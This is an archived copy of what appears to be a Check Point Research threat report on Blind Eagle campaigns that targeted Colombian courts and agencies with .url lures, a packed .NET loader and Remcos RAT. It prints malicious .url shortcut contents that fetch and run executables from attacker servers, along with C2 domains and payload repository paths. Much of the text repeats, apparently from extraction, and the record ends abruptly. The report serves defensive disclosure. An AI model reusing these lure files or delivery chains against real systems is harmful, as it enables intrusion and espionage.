{ "id": "d4ff7202-2b5b-40ff-a595-916d592a0525", "created_at": "2026-04-06T00:20:06.177514Z", "updated_at": "2026-04-10T13:12:26.916922Z", "deleted_at": null, "sha1_hash": "6443e6d70d7f834d28ebd54745fadb7ba6a297b8", "title": "Blind Eagle: …And Justice for All - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1151458, "plain_text": "Blind Eagle: …And Justice for All - Check Point Research\r\nBy antoniost@checkpoint.com\r\nPublished: 2025-03-10 · Archived: 2026-04-02 10:56:43 UTC\r\nKey Points\r\nCheck Point Research discovered a series of ongoing campaigns targeting Colombian institutions and government\r\nentities since November 2024. The campaigns are linked to Blind Eagle, also known as APT-C-36, and deliver\r\nmalicious .url files, which cause a similar effect to the CVE-2024-43451 vulnerability.\r\nCVE-2024-43451 exposes a user’s NTLMv2 hash, which can allow an attacker to authenticate as the user via pass-the-hash or relay attacks. This vulnerability can be triggered just by right-clicking, deleting, or dragging the file.\r\nWhile the Blind Eagle malicious file does not exploit this vulnerability, it triggers a WebDAV request in the same\r\nuncommon ways, notifying the attacker that the file was downloaded. Finally, when the user clicks on the file, it\r\ndownloads the next-stage payload via another WebDAV request and executes the malware.\r\nMicrosoft patched the original vulnerability on November 12, 2024. Just six days later, Blind Eagle included this\r\n.url variant in its attack arsenal and campaigns.\r\nThe monitored campaigns targeted Colombian judicial institutions and other government or private organizations,\r\nwith high infection rates. More than 1,600 victims were affected during one of these campaigns which took place\r\naround December 19, 2024. This infection rate is significant considering Blind Eagle’s targeted APT approach.\r\nThe malware is often delivered using legitimate file-sharing platforms such as Google Drive and Dropbox.\r\nHowever, in recent campaigns, Blind Eagle has also distributed its payloads through Bitbucket and GitHub.\r\nThe group utilizes malware and tools which are well-known within underground crime communities, a trend that\r\ncontinues with recent discoveries. To protect its malware, Blind Eagle leverages the Packer-as-a-Service\r\nHeartCrypt, which employs a .NET RAT that appears to be a variant of  PureCrypter. The final stage payload is\r\nRemcos RAT.\r\nBlind Eagle has long been suspected to originate from South America. We identified the group’s operating timezone\r\nas UTC-5, which aligns with several South American countries.\r\nOperation fail (OPFail) revealed phishing campaigns in early March 2024 in which the group impersonated\r\nColombian banks. These campaigns were highly successful, resulting in the collection of over 8,000 entries of\r\nPersonally Identifiable Information (PII).\r\nIntroduction\r\nAPT-C-36, also known as Blind Eagle, is a threat group that engages in both espionage and cybercrime. It primarily\r\ntargets organizations in Colombia and other Latin American countries. Active since 2018, this Advanced Persistent\r\nThreat (APT) group focuses on government institutions, financial organizations, and critical infrastructure.\r\nBlind Eagle is known for employing sophisticated social engineering tactics, using phishing emails with malicious\r\nattachments or links to gain initial access to target systems. Their malware arsenal includes commodity Remote Access\r\nTrojans (RATs) such as NjRAT, AsyncRAT, and Remcos.\r\nOur research revealed that the group recently expanded its toolkit with additional commodity malware. To protect their\r\nmalicious executables, Blind Eagle utilizes the Packer-as-a-Service HeartCrypt, which they use to pack a .NET RAT that\r\nappears to be a variant of PureCrypter. Remcos RAT remains the final payload.\r\nOn November 12, 2024, Microsoft patched a newly discovered vulnerability, CVE-2024-43451. This vulnerability was\r\nactively exploited in the wild using .url files containing malicious code, which could be triggered through unusual user\r\nactions such as right-clicking the file, deleting it, or performing a drag-and-drop operation. Exploited as a zero-day, it\r\nwas used in attacks targeting Ukraine. According to CERT-UA, the campaign was attributed to the threat actor UAC-0194,\r\nsuspected to be Russian-affiliated.\r\nSix days after Microsoft released the patch, Blind Eagle included a variant of this exploit in its attack arsenal and\r\ncampaigns. While this variant does not actually expose the NTLMv2 hash, it notifies the threat actors that the file was\r\ndownloaded by the same unusual user-file interactions. On devices vulnerable to CVE-2024-43451, a WebDAV request is\r\ntriggered even before the user manually interacts with the file with the same unusual behavior. Meanwhile, on both patched\r\nand unpatched systems, manually clicking the malicious .url file initiates the download and execution of the next-stage\r\npayload. After incorporating this file into their campaigns, the group targeted mainly Colombian public and private\r\norganizations, with high infection rates. More than 1600 victims were infected during a campaign that occurred around\r\nDecember 19, 2024. Considering Blind Eagle’s targeted APT approach, this infection rate is significant.\r\nBlind Eagle .url Payloads\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 1 of 17\n\nCVE-2024-43451 is a vulnerability that exposes a user’s NTLMv2 hash, which can allow an attacker to authenticate as the\r\nuser via pass-the-hash or relay attacks. If the compromised account has high privileges and proper mitigations (such as SMB\r\nsigning and NTLM relay protections) that are not enforced, this could lead to lateral movement, privilege escalation, or even\r\nfull domain compromise. Eventually, the user, by manually clicking, creates an SMB connection through port 445, which\r\ndownloads and executes the malicious payload. The exploit reported by CERT-UA:\r\nURL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe\r\nIconFile=C:\\\\Windows\\\\System32\\\\SHELL32.dll\r\n[{009862A0-0000-0000-C000-000000005986}]\r\n[{000214A0-0000-0000-C000-000000000046}]\r\nURL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe\r\n[InternetShortcut] URL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe IconIndex=1\r\nHotKey=0 IDList= IconFile=C:\\\\Windows\\\\System32\\\\SHELL32.dll [{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,9 [{000214A0-0000-0000-C000-000000000046}] [InternetShortcut.A] [InternetShortcut.W]\r\nURL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe\r\n[InternetShortcut]\r\nURL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe\r\nIconIndex=1\r\nHotKey=0\r\nIDList=\r\nIconFile=C:\\\\Windows\\\\System32\\\\SHELL32.dll\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,9\r\n[{000214A0-0000-0000-C000-000000000046}]\r\n[InternetShortcut.A]\r\n[InternetShortcut.W]\r\nURL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe\r\nCVE-2024-43451 affects all supported Windows versions, and it is triggered in uncommon ways:\r\nA single right-click on the file (all Windows versions).\r\nDeleting the file (Windows 10/11).\r\nDragging the file to another folder (Windows 10/11 and some Windows 7/8/8.1 configurations).\r\nThe .url file below, used by Blind Eagle against Colombian institutions, is a variant of this CVE, but without the\r\nexploiting part, meaning it does not expose the NTLMv2 hash. When manually clicked by the user, this file also downloads\r\nmalicious files, but instead of using SMB (port: 445), it uses HTTP. When a URL is in UNC Path format, it first attempts an\r\nSMB connection, and if this is unavailable, it attempts WebDAV. However, once the port is specified, which in this case is\r\n@80 , the SMB attempt is avoided, and the connection is made directly over HTTP with the User-Agent Microsoft-WebDAV-MiniRedir/10.0.19044 .\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nURL=file://\\\\\\\\62.60[.]226[.]64@80\\\\file\\\\4025_3980.exe\r\n[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2 [InternetShortcut] IconIndex=11 IconFile=C:\\\\Program Files\r\n(x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe IDList= URL=file://\\\\\\\\62.60[.]226[.]64@80\\\\file\\\\4025_3980.exe\r\nHotKey=0\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,2\r\n[InternetShortcut]\r\nIconIndex=11\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nIDList=\r\nURL=file://\\\\\\\\62.60[.]226[.]64@80\\\\file\\\\4025_3980.exe\r\nHotKey=0\r\nWhile this variant does not directly exploit the vulnerability, it exhibits unusual behavior by communicating with the server\r\nwithout requiring manual user interaction. However, for the .url file to download the next-stage payload, the user must\r\nmanually click it, which triggers a WebDAV request over port 80.\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 2 of 17\n\nThis variant serves as a valuable tool for threat actors, as it notifies them when a targeted user downloads the malicious\r\n.url file. Even if the user does not directly execute the file, Blind Eagle can still detect the interaction, providing insight\r\ninto potential targets.\r\nFigure 1 – Unpatched Vulnerable – Windows 7, Right Click WebDAV request.\r\nSince Microsoft patched this vulnerability, this unusual behavior no longer occurs. However, manual user interaction can\r\nstill trigger the download and execution of the malicious payload.\r\nFigure 2 – Patched – Windows 10, execution.\r\nBlind Eagle Campaigns\r\nMicrosoft published this vulnerability on November 12, 2024. On November 18, we observed the first crafted payload. This\r\n.url file infected both patched and unpatched machines. Since then, we observed multiple campaigns targeting Colombia,\r\nand the dropped payload was a .NET RAT that downloads the final stage from GitHub or BitBucket, a Remcos RAT.\r\nHowever, to this day, most of those .url files are not detected by any Anti-Virus engine on VirusTotal.\r\nFigure 3 – First stage .url undetected on VT.\r\nThese ongoing campaigns, based on filenames, appear to primarily target various Colombian government organizations,\r\nincluding the Justice System. These are some of the malicious .url filenames:\r\n[Filename] - Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\r\nCONTINUACIÓN JUICIO ORAL REFERENCIA.url\r\n[English] - \"Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the continuation of the\r\noral trial in reference.\"\r\n[Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url\r\n[English] - \"Notification of hearing for the taking of samples involving the defendant.\"\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 3 of 17\n\n[Filename] - QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales\r\nde Bogotá.url\r\n[English] - \"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogotá.\"\r\n[Filename] - este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url\r\n[English] - \"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.\"\r\n[Filename] - en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url\r\n[English] - \"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.\"\r\n[Filename] - COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948\r\nPROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url\r\n[English] - \"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued\r\nCriminal 00028483 November 28.\"\r\n[Filename] - Oficio Tutelar 0439594 - Proceso N° 03948939-002024.url\r\n[English] - \"Protective Order 0439594 - Case No. 03948939-002024.\"\r\n[Filename] - Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\r\nCONTINUACIÓN JUICIO ORAL REFERENCIA.url [English] - \"Courts of sentence execution in Bogotá with knowledge\r\nfunction scheduled a hearing for the continuation of the oral trial in reference.\" [Filename]\r\nNOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url [English] -\r\n\"Notification of hearing for the taking of samples involving the defendant.\" [Filename] -\r\nQUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de\r\nBogotá.url [English] - \"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of\r\nBogotá.\" [Filename] - este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url\r\n[English] - \"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.\"\r\n[Filename] - en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url\r\n[English] - \"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.\"\r\n[Filename] - COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948\r\nPROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url [English] - \"Communication No. 00239948 issued Criminal\r\n00028483 November 28 / Official Letter No. 00239948 issued Criminal 00028483 November 28.\" [Filename] - Oficio\r\nTutelar 0439594 - Proceso N° 03948939-002024.url [English] - \"Protective Order 0439594 - Case No. 03948939-002024.\"\r\n[Filename] - Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\r\n[English] - \"Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the contin\r\n[Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url\r\n[English] - \"Notification of hearing for the taking of samples involving the defendant.\"\r\n[Filename] - QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de Bo\r\n[English] - \"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogot\r\n[Filename] - este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot\r\n[English] - \"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogo\r\n[Filename] - en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Segur\r\n[English] - \"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measure\r\n[Filename] - COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948 PROFERIDO PENA\r\n[English] - \"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 is\r\n[Filename] - Oficio Tutelar 0439594 - Proceso N° 03948939-002024.url\r\n[English] - \"Protective Order 0439594 - Case No. 03948939-002024.\"\r\nWhile operating with the specific malicious file for over two months, the APT group has changed approximately more than\r\nten different C\u0026Cs (Command and Control Servers) for its final stage payload. The attack chain has some small variations,\r\nbut the .url files are always part of the campaign during the initial stage.\r\nCampaigns ‘socialismo’ \u0026 ‘miami’- January 21-22, 2025\r\nDuring the campaigns that took place around January 21 and 22, 2025, the APT group distributed multiple .url files via\r\nemail through possibly compromised Google Drive accounts.\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 4 of 17\n\nFigure 4 – Email with Google Drive link.\r\nThe specified file icon in the .url file is equivalent to the one from the Edge browser. Many of the endpoints contacted by\r\nthe .url contain multiple malicious files, though we can not attribute all files hosted on those servers to Blind Eagle.\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nURL=file://\\\\\\\\62.60.226[.]64@80\\\\file\\\\3819_5987.exe\r\n[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2 [InternetShortcut] IconIndex=11 IconFile=C:\\\\Program Files\r\n(x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe IDList= URL=file://\\\\\\\\62.60.226[.]64@80\\\\file\\\\3819_5987.exe\r\nHotKey=0\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,2\r\n[InternetShortcut]\r\nIconIndex=11\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nIDList=\r\nURL=file://\\\\\\\\62.60.226[.]64@80\\\\file\\\\3819_5987.exe\r\nHotKey=0\r\nThe downloaded executable appears to be packed using the Packer as a Service HeartCrypt. This later injects into\r\ncsc.exe a .NET executable responsible for unpacking and executing in memory a .NET RAT, which appears to be a\r\nvariant of PureCrypter. This .NET RAT retrieves various user and machine information such as 1) Username, 2) OS\r\nVersion, 3) Process name and architecture, 4) Antivirus installed, and other machine specs. After it decrypted its\r\nconfiguration, which is embedded as a resource, we observed the campaign ID socialismo and the C\u0026C which\r\ncommunicates. The C\u0026C republicadominica2025[.]ip-ddns[.]com , after it received the user data, responded with a URL\r\nto download and execute the next stage payload. The final stage is downloaded from the GitHub repository\r\nOscarito20222/file , and the malware is the known Remote Access Trojan Remcos RAT with C\u0026C elyeso.ip-ddns[.]com:30204 and Botnet name redtube .\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 5 of 17\n\nFigure 5 – Campaign socialismo attack chain.\r\nBoth of the domain names from the .NET RAT and the Remcos RAT resolve to the same IP address 177.255.85[.]101 .\r\nThe group has used this IP for multiple Remcos C\u0026Cs through January \u0026 February campaigns:\r\namuntgroupfree.ip-ddns[.]com\r\nrepublicadominica2025.ip-ddns[.]com\r\namuntgroupfree.ip-ddns[.]com donato.con-ip[.]com elyeso.ip-ddns[.]com comina998.ddns-ip[.]net\r\nrepublicadominica2025.ip-ddns[.]com\r\namuntgroupfree.ip-ddns[.]com\r\ndonato.con-ip[.]com\r\nelyeso.ip-ddns[.]com\r\ncomina998.ddns-ip[.]net\r\nrepublicadominica2025.ip-ddns[.]com\r\nIt is worth mentioning that the attacker’s GitHub repository is used in multiple Blind Eagle campaigns to deliver the final\r\nstage payload, Remcos. This repository is constantly updated with new files that communicate with the latest C\u0026C. All the\r\nrepository updates were committed in the timezone -0500 , which could possibly indicate Blind Eagle’s country of origin\r\naligns with South American countries. Examples of commits:\r\n==================================================\r\n[2025-02-04T20:00:59Z] Author: Oscarito20222\r\ntree 62c86b52fabaaecc398b902965e58c4154edc427\r\nparent a84f5a384b090598cd29be6b2492cbb45c73c3ac\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738699259 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738699259 -0500\r\n* fuck.exe - 3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a\r\n* redtube.exe - 758c73ab9706ae6977f9b4601c20b3667836d3ef\r\n* roma.exe - ba95ea1dcc744566a9552d9665feff035925a5c5\r\n==================================================\r\n[2025-02-06T15:51:50Z] Author: Oscarito20222\r\ntree 220a606655d64d03762d319c5f5b80038e5bc13c\r\nparent 29335b62acef53cb7076f81b8fa25e9baf6d9994\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857110 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857110 -0500\r\n==================================================\r\n[2025-02-06T15:52:02Z] Author: Oscarito20222\r\ntree e9e56beee7cf526a4df97e35f2df9458cae0ec23\r\nparent b7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857122 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857122 -0500\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 6 of 17\n\n==================================================\r\n[2025-02-06T15:52:11Z] Author: Oscarito20222\r\ntree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\r\nparent d2279dc66302d8afad41c82ad81d0733e1f2273d\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857131 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857131 -0500\r\n==================================================\r\n[2025-02-06T15:52:33Z] Author: Oscarito20222\r\ntree 5d1edc470b4b33a31f982077e08b2e61f438feab\r\nparent a7b74e834eddb6eb9a23a268c7088b3aeba493d4\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857153 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857153 -0500\r\n* normales.exe - 3d3248ad14dce8b6fcf416d56d8de52b07b549e7\r\n================================================== [2025-02-04T20:00:59Z] Author: Oscarito20222 tree\r\n62c86b52fabaaecc398b902965e58c4154edc427 parent a84f5a384b090598cd29be6b2492cbb45c73c3ac author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738699259 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1738699259 -0500 Add files via upload * fuck.exe -\r\n3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a * redtube.exe - 758c73ab9706ae6977f9b4601c20b3667836d3ef * roma.exe\r\n- ba95ea1dcc744566a9552d9665feff035925a5c5 ==================================================\r\n[2025-02-06T15:51:50Z] Author: Oscarito20222 tree 220a606655d64d03762d319c5f5b80038e5bc13c parent\r\n29335b62acef53cb7076f81b8fa25e9baf6d9994 author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857110 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1738857110 -0500 Delete roma.exe ================================================== [2025-02-\r\n06T15:52:02Z] Author: Oscarito20222 tree e9e56beee7cf526a4df97e35f2df9458cae0ec23 parent\r\nb7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5 author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857122 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1738857122 -0500 Delete redtube.exe ================================================== [2025-02-\r\n06T15:52:11Z] Author: Oscarito20222 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 parent\r\nd2279dc66302d8afad41c82ad81d0733e1f2273d author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857131 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1738857131 -0500 Delete fuck.exe ================================================== [2025-02-\r\n06T15:52:33Z] Author: Oscarito20222 tree 5d1edc470b4b33a31f982077e08b2e61f438feab parent\r\na7b74e834eddb6eb9a23a268c7088b3aeba493d4 author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857153 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1738857153 -0500 Add files via upload * normales.exe - 3d3248ad14dce8b6fcf416d56d8de52b07b549e7\r\n==================================================\r\n[2025-02-04T20:00:59Z] Author: Oscarito20222\r\ntree 62c86b52fabaaecc398b902965e58c4154edc427\r\nparent a84f5a384b090598cd29be6b2492cbb45c73c3ac\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738699259 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738699259 -0500\r\nAdd files via upload\r\n * fuck.exe - 3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a\r\n * redtube.exe - 758c73ab9706ae6977f9b4601c20b3667836d3ef\r\n * roma.exe - ba95ea1dcc744566a9552d9665feff035925a5c5\r\n==================================================\r\n[2025-02-06T15:51:50Z] Author: Oscarito20222\r\ntree 220a606655d64d03762d319c5f5b80038e5bc13c\r\nparent 29335b62acef53cb7076f81b8fa25e9baf6d9994\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857110 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857110 -0500\r\nDelete roma.exe\r\n==================================================\r\n[2025-02-06T15:52:02Z] Author: Oscarito20222\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 7 of 17\n\ntree e9e56beee7cf526a4df97e35f2df9458cae0ec23\r\nparent b7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857122 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857122 -0500\r\nDelete redtube.exe\r\n==================================================\r\n[2025-02-06T15:52:11Z] Author: Oscarito20222\r\ntree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\r\nparent d2279dc66302d8afad41c82ad81d0733e1f2273d\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857131 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857131 -0500\r\nDelete fuck.exe\r\n==================================================\r\n[2025-02-06T15:52:33Z] Author: Oscarito20222\r\ntree 5d1edc470b4b33a31f982077e08b2e61f438feab\r\nparent a7b74e834eddb6eb9a23a268c7088b3aeba493d4\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857153 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857153 -0500\r\nAdd files via upload\r\n * normales.exe - 3d3248ad14dce8b6fcf416d56d8de52b07b549e7\r\nThe GitHub account also contains another repository named diciembre , which includes an archive with a .vbs file.\r\nNotably, this commit from two years ago was made in the same UTC-5 timezone as the recent activity.\r\nFigure 6 – Blind Eagle GitHub account.\r\nThis repository, which was “untouched” for over two years, was updated on February 25, 2025, and introduced a new\r\nRemcos RAT with C\u0026C 21ene.ip-ddns[.]com:30204 .\r\nFigure 7 – Recent diciembre repository campaigns.\r\nCampaigns ‘PARAISO’, ‘PARAISO2’, ‘marte’ \u0026 ‘saturno’ – December 2024\r\nAlthough similar to the previous campaign, this one leveraged Bitbucket instead of GitHub as the final-stage distribution\r\nplatform.\r\nCampaign .NET RAT C\u0026C Remcos C\u0026C Remcos ITW\r\n[2024-12-\r\n10] marte\r\nnewstaticfreepoint24.ddns-ip[.]net -\u003e\r\n181.131.217.244\r\nnewstaticfreepoint24.ddns-ip[.]netbitbucket[.]org/facturacioncol/fact/downloads/FileHosting.exe\r\nbitbucket[.]org/facturacioncol/fact/downloads/luna.exe\r\n[2024-12-\r\n11] saturno\r\nnewstaticfreepoint24.ddns-ip[.]netnewstaticfreepoint24.ddns-ip[.]net\r\nbitbucket[.]org/facturacioncol/fact/downloads/Out2.exe\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 8 of 17\n\nCampaign .NET RAT C\u0026C Remcos C\u0026C Remcos ITW\r\n[2024-12-\r\n19]\r\nPARAISO\r\nnewstaticfreepoint24.ddns-ip[.]netnewstaticfreepoint24.ddns-ip[.]netbitbucket[.]org/trabajo12023/proyecto/downloads/ROSAS.exe\r\nbitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280\r\n[2024-12-\r\n19]\r\nPARAISO2\r\nnewstaticfreepoint24.ddns-ip[.]net\r\nnewstaticfreepoint24.ddns-ip[.]net\r\n17dic.ydns[.]eu -\u003e\r\n181.131.217.244\r\nbitbucket[.]org/trabajo12023/proyecto/downloads/AD.exe\r\nbitbucket[.]org/trabajo12023/proyecto/downloads/Simpson.exe\r\nbitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280\r\nIn these campaigns, two Bitbucket repositories were abused and contained Remcos RAT executable files, which were\r\nuploaded to Bitbucket around December 2024. Considering this APT group’s activity and approach, a significant number\r\nof victims ultimately downloaded these malicious executables.\r\nFigure 8 – facturacioncol/fact Bitbucket repository.\r\nThe PARAISO campaign was very successful, infecting more than 1600 victims with Remcos RAT and C\u0026C\r\nnewstaticfreepoint24.ddns-ip.net:3020 . The total infections across those campaigns, which occurred for over a week,\r\nwere approximately 9,000.\r\nFigure 9 – trabajo12023/proyecto Bitbucket repository.\r\nBlind Eagle – .url Campaigns\r\nSince adding this file to its arsenal, Blind Eagle consistently targeted Colombia, primarily focusing on justice and other\r\ngovernment organizations. The group sent emails with malicious Google Drive links containing either an archive or the\r\nactual .url . Those files triggered WebDAV requests on unpatched machines and, once clicked by the user, resulted in a\r\nWebDAV request that downloaded a HeartCrypt-packed malware. This malware then extracted and injected a packed .NET\r\nloader into csc.exe , which later loaded a .NET RAT which appears to be a variant of PureCrypter. This .NET RAT\r\ndecrypted its configuration, which contains execution parameters such as the C\u0026C server and the campaign ID. After\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 9 of 17\n\nsending encrypted user data, the malware receives a URL to download the final stage payload, Remcos RAT. Those final\r\npayloads were initially hosted on compromised servers and later on GitHub or Bitbucket.\r\nFigure 10 – Blind Eagle November until February Campaigns.\r\nThroughout multiple campaigns, the group registered different domain names for its C\u0026C servers, even though they were\r\nhosted on the same IP address. During campaigns such as socialismo , the C\u0026C of the .NET RAT was\r\nrepublicadominica2025[.]ip-ddns[.]com and for the final stage elyeso.ip-ddns[.]com , but both of them resolved to the\r\nsame IP 177[.]255.85[.]101 .\r\nAPT OPFail \u0026 Past Phishing Campaigns\r\nCheck Point Research was closely monitoring Blind Eagle activities, we discovered an operation failure in which the\r\ngroup revealed its past phishing activities together with the victim’s Personally Identifiable Information (PII).\r\nDuring January and February, the APT group delivered the last stage payload via files uploaded to the Oscarito20222/file\r\nrepository. The account Oscarito20222 also had another repository, which had only one commit from two years ago,\r\nOscarito20222/diciembre .\r\nOn February 25, 2025, this changed. The repository diciembre received updates and also began delivering Remcos during\r\nthe next campaigns. To understand why this shift occurred, we had to examine the previous repository responsible for\r\ndelivering the final payload in the attack chain.\r\nOscarito20222/file final commits:\r\n==================================================\r\n[2025-02-25T14:01:33Z] Author: Oscarito20222\r\ntree f03354f986a1398d1b471c0af75b404474cf94f7\r\nparent 9653938c6fd4b347209d87923f3617d70a3c12e2\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740492093 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740492093 -0500\r\n* Ver Datos del Formulario.html - e0837aebd649dba01bc4d594ef21a8086edaaeeb\r\n==================================================\r\n[2025-02-25T15:27:01Z] Author: Oscarito20222\r\ntree 63a5c5307b93e0393aba14b42d7915ab7a2733ef\r\nparent 12eacb556eee889a16beb2fe9449748ebb4e33b0\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740497221 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740497221 -0500\r\nDelete Ver Datos del Formulario.html\r\n================================================== [2025-02-25T14:01:33Z] Author: Oscarito20222 tree\r\nf03354f986a1398d1b471c0af75b404474cf94f7 parent 9653938c6fd4b347209d87923f3617d70a3c12e2 